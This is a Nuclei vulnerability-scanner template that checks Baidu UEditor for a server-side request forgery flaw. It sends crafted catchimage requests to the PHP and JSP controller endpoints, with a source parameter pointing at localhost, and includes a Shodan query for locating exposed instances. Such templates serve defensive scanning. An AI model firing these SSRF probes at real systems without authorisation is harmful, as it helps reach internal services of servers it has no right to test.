nuclei-templates/http/vulnerabilities/ueditor/ueditor-ssrf.yaml

44 lines
1.2 KiB
YAML

id: ueditor-ssrf
info:
name: UEditor - Server Side Request Forgery
author: pwnhxl
severity: medium
description: UEditor contains an Server Side Request Forgery vulnerability.
reference:
- https://xz.aliyun.com/t/4154
- https://www.seebug.org/vuldb/ssvid-97311
metadata:
verified: true
max-request: 2
shodan-query: html:"UEditor"
product: ueditor
vendor: baidu
tags: ueditor,ssrf
classification:
cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
- "{{BaseURL}}/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
- "{{BaseURL}}/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '\u94fe\u63a5\u4e0d\u53ef\u7528'
- '"original":'
- '"SUCCESS"'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022034a2ccb1f146bbff39753d4c528f61104f9338c229ca80ce3d1d4895147c79ba02210082745015da69b50bc88d075fac2062fe2732be6a2217350bbc8cb1415be6b272:922c64590222798bb761d5b6d8e72950